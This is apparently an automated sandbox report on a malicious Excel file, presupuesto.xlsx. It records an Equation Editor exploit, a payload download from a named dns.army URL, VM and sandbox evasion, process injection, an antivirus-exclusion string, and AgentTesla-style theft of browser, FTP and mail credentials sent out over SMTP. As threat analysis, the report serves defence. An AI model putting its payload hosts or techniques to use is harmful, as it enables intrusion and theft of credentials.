                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: presupuesto.xlsxStream path 'EncryptedPackage' entropy: 7.99943007922 (max. 8.0)

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM3Show sources
                  Source: Yara matchFile source: 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2684, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9649
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2544Thread sleep time: -420000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2708Thread sleep time: -101103s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 3024Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1288Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2424Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2424Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 948Thread sleep count: 9649 > 30
                  Source: C:\Users\Public\vbc.exe TID: 948Thread sleep count: 98 > 30
                  Source: C:\Users\Public\vbc.exe TID: 2424Thread sleep count: 93 > 30
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 101103
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: VMWARE
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                  Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: vbc.exe, 00000005.00000002.2344746822.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: vbc.exe, 00000005.00000002.2344746822.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: vbc.exe, 00000005.00000002.2344746822.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: !Progman
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2344473049.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2151905175.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3000, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2684, type: MEMORY
                  Source: Yara matchFile source: 4.2.vbc.exe.3366550.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.3366550.4.raw.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3000, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2344473049.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2151905175.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3000, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2684, type: MEMORY
                  Source: Yara matchFile source: 4.2.vbc.exe.3366550.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.3366550.4.raw.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading111OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1Credentials in Registry1Security Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information21Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 385364 Sample: presupuesto.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 9 other signatures 2->43 7 EQNEDT32.EXE 16 2->7         started        12 EXCEL.EXE 38 30 2->12         started        process3 dnsIp4 33 surestdysbonescagecv.dns.army 103.153.76.181, 49168, 80 TWIDC-AS-APTWIDCLimitedHK unknown 7->33 35 fqe.short.gy 52.59.165.42, 443, 49165 AMAZON-02US United States 7->35 21 C:\Users\user\AppData\...\svchost[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 53 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->53 14 vbc.exe 7->14         started        25 C:\Users\user\Desktop\~$presupuesto.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->57 59 Injects a PE file into a foreign processes 14->59 17 vbc.exe 2 14->17         started        process9 dnsIp10 27 smtp.oucabem.com.br 17->27 29 pop.oucabem.com.br 17->29 31 mail.ita.locaweb.com.br 17->31 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->45 47 Tries to steal Mail credentials (via file access) 17->47 49 Tries to harvest and steal ftp login credentials 17->49 51 Tries to harvest and steal browser information (history, passwords, etc) 17->51 signatures11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  presupuesto.xlsx33%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  5.2.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1138205Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  fqe.short.gy0%VirustotalBrowse
                  mail.ita.locaweb.com.br0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://d2rIi4JlBhFsgbEW3nM.com0%Avira URL Cloudsafe
                  http://smtp.oucabem.com.br0%Avira URL Cloudsafe
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://epVtFD.com0%Avira URL Cloudsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  http://mail.ita.locaweb.com.br0%Avira URL Cloudsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://surestdysbonescagecv.dns.army/documenpt/svchost.exe0%Avira URL Cloudsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  surestdysbonescagecv.dns.army
                  103.153.76.181
                  truetrue
                    unknown
                    fqe.short.gy
                    52.59.165.42
                    truefalseunknown
                    mail.ita.locaweb.com.br
                    191.252.112.194
                    truefalseunknown
                    smtp.oucabem.com.br
                    unknown
                    unknowntrue
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://surestdysbonescagecv.dns.army/documenpt/svchost.exetrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://d2rIi4JlBhFsgbEW3nM.comvbc.exe, 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://smtp.oucabem.com.brvbc.exe, 00000005.00000002.2345096195.00000000024A6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2346417660.0000000005B80000.00000002.00000001.sdmpfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://epVtFD.comvbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://mail.ita.locaweb.com.brvbc.exe, 00000005.00000002.2345096195.00000000024A6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.%s.comPAvbc.exe, 00000005.00000002.2346417660.0000000005B80000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2151684455.00000000022C1000.00000004.00000001.sdmpfalse
                          high
                          https://api.ipify.org%vbc.exe, 00000005.00000002.2344998147.00000000023E8000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2151905175.00000000032C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2344473049.0000000000402000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpfalse
                            high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            52.59.165.42
                            fqe.short.gyUnited States
                            16509AMAZON-02USfalse
                            103.153.76.181
                            surestdysbonescagecv.dns.armyunknown
                            134687TWIDC-AS-APTWIDCLimitedHKtrue

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:385364
                            Start date:12.04.2021
                            Start time:11:27:25
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:presupuesto.xlsx
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winXLSX@6/20@6/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 0.3% (good quality ratio 0.1%)
                            • Quality average: 19.6%
                            • Quality standard deviation: 30%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xlsx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.210, 2.20.142.209, 205.185.216.42, 205.185.216.10
                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:27:57API Interceptor69x Sleep call for process: EQNEDT32.EXE modified
                            11:28:03API Interceptor782x Sleep call for process: vbc.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            52.59.165.42remittance info.xlsxGet hashmaliciousBrowse
                              Required Order Quantity.xlsxGet hashmaliciousBrowse
                                Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                    Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                      http://announcement.smarttechresources.net/track.aspx?6OxJvzbWgtyuD1z1ovZRjhA7oCeMofncfehKrR8LacCTunDd8llWUsge4AR9zTiorDL1aZ4kAoU=Get hashmaliciousBrowse
                                        103.153.76.181PAGO.xlsxGet hashmaliciousBrowse
                                        • wsdysuresbonescagegp.dns.army/documenpt/svchost.exe
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • wsdysuresbonescagegp.dns.army/documenpt/svchost.exe
                                        PAGO.xlsxGet hashmaliciousBrowse
                                        • suresstdybonescagesc.dns.army/documenpt/svchost.exe
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • suresstdybonescagesc.dns.army/documenpt/svchost.exe
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • wsdysuresbonescageqa.dns.army/documenpt/svchost.exe
